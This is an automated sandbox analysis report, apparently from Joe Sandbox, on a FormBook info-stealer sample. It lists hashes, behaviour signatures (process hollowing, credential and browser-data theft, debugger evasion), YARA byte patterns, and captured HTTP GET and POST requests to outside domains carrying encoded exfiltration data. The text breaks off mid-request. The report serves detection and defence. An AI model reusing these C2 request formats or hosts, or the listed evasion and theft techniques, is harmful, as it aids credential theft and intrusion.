Play interactive tourEdit tour

# Analysis Report itres.bin

## Overview

### General Information

 Sample Name: itres.bin (renamed file extension from bin to exe) Analysis ID: 287347 MD5: f028d6c9991258c5c75e9f234d4dee79 SHA1: 2f6b7f76bb4a3342f3450e1cc9ef539c2028c59e SHA256: 576f0ed5ae69ececc1bb11492479101c0281af46cb86a73eae9195376ab02717 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64itres.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\itres.exe' MD5: F028D6C9991258C5C75E9F234D4DEE79)itres.exe (PID: 4468 cmdline: C:\Users\user\Desktop\itres.exe MD5: F028D6C9991258C5C75E9F234D4DEE79)explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)systray.exe (PID: 6068 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)cmd.exe (PID: 3352 cmdline: /c del 'C:\Users\user\Desktop\itres.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
• 0x160ec:$sqlite3step: 68 34 1C 7B E1 • 0x16008:$sqlite3text: 68 38 2A 90 C5
• 0x1612d:$sqlite3text: 68 38 2A 90 C5 • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
• 0x16143:$sqlite3blob: 68 53 D8 7F 8C 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 16 entries
SourceRuleDescriptionAuthorStrings
1.2.itres.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
1.2.itres.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 1.2.itres.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x153d9:$sqlite3step: 68 34 1C 7B E1
• 0x154ec:$sqlite3step: 68 34 1C 7B E1 • 0x15408:$sqlite3text: 68 38 2A 90 C5
• 0x1552d:$sqlite3text: 68 38 2A 90 C5 • 0x1541b:$sqlite3blob: 68 53 D8 7F 8C
• 0x15543:$sqlite3blob: 68 53 D8 7F 8C 1.2.itres.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security 1.2.itres.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 1 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for submitted file Show sources
 Source: itres.exe Virustotal: Detection: 56% Perma Link Source: itres.exe ReversingLabs: Detection: 58%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: itres.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 1.2.itres.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E7F460 FindFirstFileW,FindNextFileW,FindClose, 4_2_02E7F460 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E7F459 FindFirstFileW,FindNextFileW,FindClose, 4_2_02E7F459 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E7F585 FindFirstFileW,FindNextFileW,FindClose, 4_2_02E7F585
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-44h] 0_2_00A5CA70 Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then jmp 00A5DB82h 0_2_00A5CF79 Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then pop edi 1_2_00415001 Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then pop edi 1_2_0040C119 Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 4_2_02E85001 Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 4_2_02E7C119

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49739 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49741 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49743 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49751 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49755
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /d9s8/?2de=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.brasserie-lafayette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JajlTyMmOo22K&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=3ubZ5tRrxIfN41eqqpIj22VrlW9j75JM4xICI34kih2i+rqjsIMd825CVukfAvIDWxA7&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.smalltownlawns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjA0pYsAdDrMj&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.thebardi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=/wmggT2FDua6/uf0m8vYUW9XM6JdOK3pq1DkZ95mxMYTiU7Z21xlQY1juaca7pTz06oP&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.connerparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1HyKj92Df3q0&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.nola3d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=C15d5iwTKlKsI3rAXZsLwlTuGsAeQEM+ckQv/EOsC4DDktzSY592Fv+KLrtwSAQYGPi+&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.23works.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oWYtlCk9w&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFR/144BWYfki&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&2dGH_=lhdDpBZXt0P HTTP/1.1Host: www.clicrhonealpes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 209.99.40.222 209.99.40.222 Source: Joe Sandbox View IP Address: 164.132.235.17 164.132.235.17 Source: Joe Sandbox View IP Address: 164.132.235.17 164.132.235.17
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.isabellelinhnguyen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.isabellelinhnguyen.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 53 4a 57 39 79 63 68 50 49 70 71 57 39 54 43 4c 38 4a 68 72 73 4e 48 57 65 50 58 66 50 50 4b 63 56 75 57 36 28 4b 7a 58 4d 4e 66 58 35 75 54 64 4e 33 28 4c 56 5a 57 49 4a 51 46 44 31 66 44 65 7e 6d 47 64 77 41 4c 75 55 37 34 51 6b 46 56 70 56 4c 53 73 53 76 68 32 42 55 44 35 77 66 47 6e 4c 63 36 62 74 54 74 72 44 66 76 32 78 43 43 68 73 54 32 33 74 52 62 6a 72 42 28 6e 4c 46 6d 52 49 43 58 77 54 39 5a 78 66 34 47 4a 4e 57 30 47 4a 6b 77 39 41 48 48 73 74 62 59 35 65 58 4f 33 51 42 31 55 62 73 66 6f 76 34 30 74 62 5f 64 52 43 5a 4b 38 68 62 4b 32 6c 6a 28 2d 6e 44 71 35 47 73 4f 41 52 38 69 54 58 4d 6d 75 6f 51 52 7a 33 54 6f 4b 50 76 57 53 72 6c 5a 7a 42 52 79 76 55 55 79 30 68 52 4e 58 77 30 4f 4d 46 33 57 76 68 44 6c 6f 35 77 6e 61 55 56 62 71 43 6b 47 4a 6f 6d 39 56 4a 73 64 4a 6e 59 5a 53 49 70 42 6b 7a 43 58 48 47 49 67 64 37 45 79 57 33 51 75 4d 7e 6d 6d 50 4a 52 54 6f 4e 51 34 6e 4a 6c 6f 55 63 78 6d 7a 7a 65 55 48 37 56 6f 70 68 57 39 4a 74 45 6f 4e 62 76 46 4e 53 6a 56 6d 53 44 4c 38 75 38 61 73 6c 50 30 6d 6f 4c 45 69 65 45 49 75 62 54 78 42 49 71 41 77 64 53 34 49 43 50 48 53 58 43 44 34 53 52 74 6a 67 75 70 6e 64 59 78 7a 37 67 6f 56 4f 78 56 71 67 76 77 32 66 65 7a 6a 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=SJW9ychPIpqW9TCL8JhrsNHWePXfPPKcVuW6(KzXMNfX5uTdN3(LVZWIJQFD1fDe~mGdwALuU74QkFVpVLSsSvh2BUD5wfGnLc6btTtrDfv2xCChsT23tRbjrB(nLFmRICXwT9Zxf4GJNW0GJkw9AHHstbY5eXO3QB1Ubsfov40tb_dRCZK8hbK2lj(-nDq5GsOAR8iTXMmuoQRz3ToKPvWSrlZzBRyvUUy0hRNXw0OMF3WvhDlo5wnaUVbqCkGJom9VJsdJnYZSIpBkzCXHGIgd7EyW3QuM~mmPJRToNQ4nJloUcxmzzeUH7VophW9JtEoNbvFNSjVmSDL8u8aslP0moLEieEIubTxBIqAwdS4ICPHSXCD4SRtjgupndYxz7goVOxVqgvw2fezjxw). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.smalltownlawns.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.smalltownlawns.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.smalltownlawns.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 34 73 76 6a 6e 49 63 65 39 71 48 6b 73 46 66 38 71 4f 31 56 6a 6d 39 53 73 31 55 77 74 71 64 58 39 55 70 42 4f 77 67 4c 75 43 36 33 77 34 6d 56 72 4b 56 7a 37 78 6c 47 58 66 73 6c 53 66 59 49 41 46 63 4a 30 6b 79 49 67 55 42 72 7a 58 78 50 47 58 51 59 31 74 65 75 63 45 30 62 68 74 4a 45 6c 54 75 42 65 61 7e 6d 61 67 31 5f 34 34 55 5a 4e 75 39 67 30 33 6c 36 59 6f 4e 4c 55 37 4b 39 35 30 38 30 66 72 72 4a 38 6b 64 55 6c 4b 33 65 52 66 5a 4a 76 50 28 79 28 59 70 4a 43 34 52 37 4a 75 63 47 53 6d 6c 6c 62 53 54 68 6a 67 7a 70 4c 34 6e 6d 4d 57 35 54 4e 4d 33 49 5a 73 6d 72 4e 50 6d 59 47 5f 33 6d 51 7a 6e 39 53 69 67 6f 31 37 43 4d 74 52 31 42 57 7a 4e 6f 42 46 6f 32 7a 77 4e 54 53 56 49 5a 55 76 48 6a 7e 50 6a 53 68 33 36 68 42 78 6b 73 49 61 6c 54 46 68 28 70 6e 4a 4e 73 66 73 75 7a 71 44 35 70 61 77 62 77 46 51 44 36 54 6f 6a 4e 57 44 37 52 32 71 31 4a 61 75 42 4f 31 69 78 4a 63 74 78 30 7a 5f 63 51 67 6a 63 39 76 46 37 5f 51 43 45 64 30 7a 7e 4b 46 2d 42 33 79 65 47 58 6b 38 70 52 62 42 43 71 51 65 46 75 7a 74 4b 74 6a 71 32 78 4f 41 6a 6e 6f 4b 42 55 44 4e 72 30 73 62 32 43 64 53 77 76 51 47 5a 4d 4a 67 49 31 58 65 46 42 50 43 74 32 36 5a 39 47 77 57 6e 33 54 31 6f 50 30 59 4d 42 7a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=4svjnIce9qHksFf8qO1Vjm9Ss1UwtqdX9UpBOwgLuC63w4mVrKVz7xlGXfslSfYIAFcJ0kyIgUBrzXxPGXQY1teucE0bhtJElTuBea~mag1_44UZNu9g03l6YoNLU7K95080frrJ8kdUlK3eRfZJvP(y(YpJC4R7JucGSmllbSThjgzpL4nmMW5TNM3IZsmrNPmYG_3mQzn9Sigo17CMtR1BWzNoBFo2zwNTSVIZUvHj~PjSh36hBxksIalTFh(pnJNsfsuzqD5pawbwFQD6TojNWD7R2q1JauBO1ixJctx0z_cQgjc9vF7_QCEd0z~KF-B3yeGXk8pRbBCqQeFuztKtjq2xOAjnoKBUDNr0sb2CdSwvQGZMJgI1XeFBPCt26Z9GwWn3T1oP0YMBzw). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.thebardi.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.thebardi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thebardi.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 37 34 45 56 67 6f 70 65 48 77 6c 52 58 33 42 50 56 43 48 71 73 36 6d 72 44 41 52 30 41 79 51 6f 45 4c 77 34 46 4c 70 41 6b 5f 53 66 50 76 4d 75 56 72 44 6a 71 68 54 47 68 67 45 47 4c 4e 67 67 61 61 73 44 4c 4c 74 58 55 63 5a 35 6c 4f 55 36 36 74 56 39 74 5f 55 45 5a 6a 34 4d 66 48 59 5a 42 58 32 4d 42 5a 57 6a 46 6b 64 73 44 41 64 4a 42 71 35 73 50 32 50 70 49 72 38 76 42 78 42 76 31 57 6d 45 67 54 37 35 51 4d 45 62 30 35 59 39 35 47 68 6f 4b 45 50 4a 53 73 59 5f 70 4a 72 51 71 32 44 63 61 43 6f 39 6b 37 4c 36 4a 35 68 30 7a 77 46 63 50 74 38 6b 54 71 56 41 65 35 63 46 7e 73 48 44 32 6f 34 47 61 50 35 41 42 41 79 77 4c 42 4e 74 47 45 38 33 51 4e 6e 6a 49 46 47 39 65 31 46 46 50 76 71 54 4c 6e 45 77 74 49 61 35 28 75 28 46 61 42 49 79 62 72 68 57 31 6e 7a 44 33 51 6f 4f 79 38 38 37 78 33 37 49 65 64 46 61 53 58 4e 4d 4b 55 30 78 75 4f 54 47 75 50 72 4c 66 2d 41 6b 31 2d 49 32 48 73 59 32 68 65 73 4b 63 6d 6a 55 30 42 78 65 73 48 70 54 39 46 4f 71 44 45 32 42 30 46 48 32 30 75 56 67 75 45 4c 62 39 65 70 53 49 56 70 41 58 44 5a 5a 56 4c 44 44 42 36 4a 50 7e 6e 70 7a 48 77 74 70 4e 77 56 78 53 7a 65 77 66 7a 6b 66 56 69 4f 74 31 59 69 69 57 5f 43 53 4d 6c 44 42 44 52 6e 6b 6d 55 57 6a 75 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=74EVgopeHwlRX3BPVCHqs6mrDAR0AyQoELw4FLpAk_SfPvMuVrDjqhTGhgEGLNggaasDLLtXUcZ5lOU66tV9t_UEZj4MfHYZBX2MBZWjFkdsDAdJBq5sP2PpIr8vBxBv1WmEgT75QMEb05Y95GhoKEPJSsY_pJrQq2DcaCo9k7L6J5h0zwFcPt8kTqVAe5cF~sHD2o4GaP5ABAywLBNtGE83QNnjIFG9e1FFPvqTLnEwtIa5(u(FaBIybrhW1nzD3QoOy887x37IedFaSXNMKU0xuOTGuPrLf-Ak1-I2HsY2hesKcmjU0BxesHpT9FOqDE2B0FH20uVguELb9epSIVpAXDZZVLDDB6JP~npzHwtpNwVxSzewfzkfViOt1YiiW_CSMlDBDRnkmUWjuw). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.connerparty.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.connerparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.connerparty.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 77 79 53 61 7e 33 61 74 46 63 7e 45 6f 38 69 4b 37 6f 69 6c 45 53 38 34 43 6f 49 4b 49 62 66 37 30 69 4b 52 42 76 35 37 79 4e 45 33 7a 6b 4c 52 6e 6e 34 43 44 75 6c 36 73 37 64 38 39 37 54 46 6e 38 6f 69 7a 78 44 51 6d 79 71 4f 68 75 45 6c 78 45 77 78 57 37 75 4b 59 51 73 30 57 32 78 6d 6b 56 38 68 4a 34 75 64 59 70 7e 6d 70 66 69 2d 4b 70 78 2d 46 4e 76 6b 51 71 49 58 6a 41 32 46 44 73 65 56 41 62 71 63 52 47 76 74 58 73 67 65 69 70 59 7a 36 32 42 78 63 59 65 62 72 6d 57 74 6c 6e 30 75 77 44 37 6c 4b 34 4e 6b 79 36 61 72 33 45 48 30 6b 59 48 56 61 68 4b 51 49 37 55 2d 45 33 38 52 4e 7a 44 47 4d 71 79 79 35 55 66 6c 6f 6b 4f 35 35 65 76 5f 73 46 75 38 32 53 33 36 52 47 4b 49 54 4b 6a 47 53 6e 44 6c 6e 6e 4b 76 71 57 61 72 75 51 49 73 4e 42 4d 6e 4f 75 65 35 7a 6a 47 37 51 53 7e 6f 4e 6c 36 47 6f 65 36 59 4a 44 35 77 44 4b 48 56 28 4b 4a 30 52 41 37 64 48 58 66 61 70 6b 77 35 37 46 49 67 4d 66 7a 4a 44 4b 31 33 33 6a 53 6a 38 52 48 36 50 7a 30 32 75 4e 4e 67 58 4f 7e 49 7e 36 44 55 76 69 6d 2d 6b 5f 36 71 76 41 4f 73 46 52 44 52 48 37 32 31 6e 37 58 4e 5a 36 51 72 38 58 5a 38 4a 75 47 75 47 5a 6c 51 75 50 64 35 6d 4a 59 49 76 7a 72 49 48 4f 35 6e 35 48 64 41 77 58 4a 42 72 42 36 37 44 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 2de=wySa~3atFc~Eo8iK7oilES84CoIKIbf70iKRBv57yNE3zkLRnn4CDul6s7d897TFn8oizxDQmyqOhuElxEwxW7uKYQs0W2xmkV8hJ4udYp~mpfi-Kpx-FNvkQqIXjA2FDseVAbqcRGvtXsgeipYz62BxcYebrmWtln0uwD7lK4Nky6ar3EH0kYHVahKQI7U-E38RNzDGMqyy5UflokO55ev_sFu82S36RGKITKjGSnDlnnKvqWaruQIsNBMnOue5zjG7QS~oNl6Goe6YJD5wDKHV(KJ0RA7dHXfapkw57FIgMfzJDK133jSj8RH6Pz02uNNgXO~I~6DUvim-k_6qvAOsFRDRH721n7XNZ6Qr8XZ8JuGuGZlQuPd5mJYIvzrIHO5n5HdAwXJBrB67DA). Source: global traffic HTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.nola3d.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.nola3d.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nola3d.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 65 3d 49 50 5a 41 46 69 59 56 58 4d 58 4e 7a 4a 71 41 33 69 5a 42 73 38 4e 37 6e 39 38 58 4a 63 34 54 36 6b 41 6c 31 6b 76 76 73 37 75 56 62 77 78 62 6d 48 39 44 70 53 7e 58 76 52 66 70 77 5f 76 52 42 43 65 4c 4e 48 58 70 65 6d 36 46 62 79 71 64 59 2d 31 63 4c 79 6c 54 54 38 6b 37 77 71 78 4d 62 65 70 47 6d 38 54 41 35 79 6e 51 48 30 37 49 57 6b 42 4f 57 4b 6f 37 57 33 79 5a 6a 61 67 72 66 61 44 4c 6f 61 61 42 4b 51 74 33 7e 44 78 6a 55 66 42 63 54 36 71 54 44 6e 30 52 71 4d 55 35 6d 7a 66 64 4c 6b 6e 46 4f 6e 61 36 62 77 62 69 62 5a 6f 53 75 72 32 37 36 68 44 69 39 38 71 53 5a 56 74 52 77 73 54 64 6d 70 58 61 7a 51 6e 6b 6a 4c 68 43 6f 4c 31 36 4e 52 76 5f 69 47 42 65 30 64 38 2d 5a 66 36 4c 50 78 64 6a 4e 53 32 66 61 6f 71 6a 47 70 33 38 49 71 4e 31 4d 5a 69 7a 28 53 73 6a 47 34 79 48 28 6c 72 56 30 6c 48 5a 5a 68 75 55 51 66 59 45 7e 52 48 61 53 7a 61 34 32 54 4d 64 48 4d 28 76 69 57 69 52 69 50 34 37 34 69 63 49 36 33 76 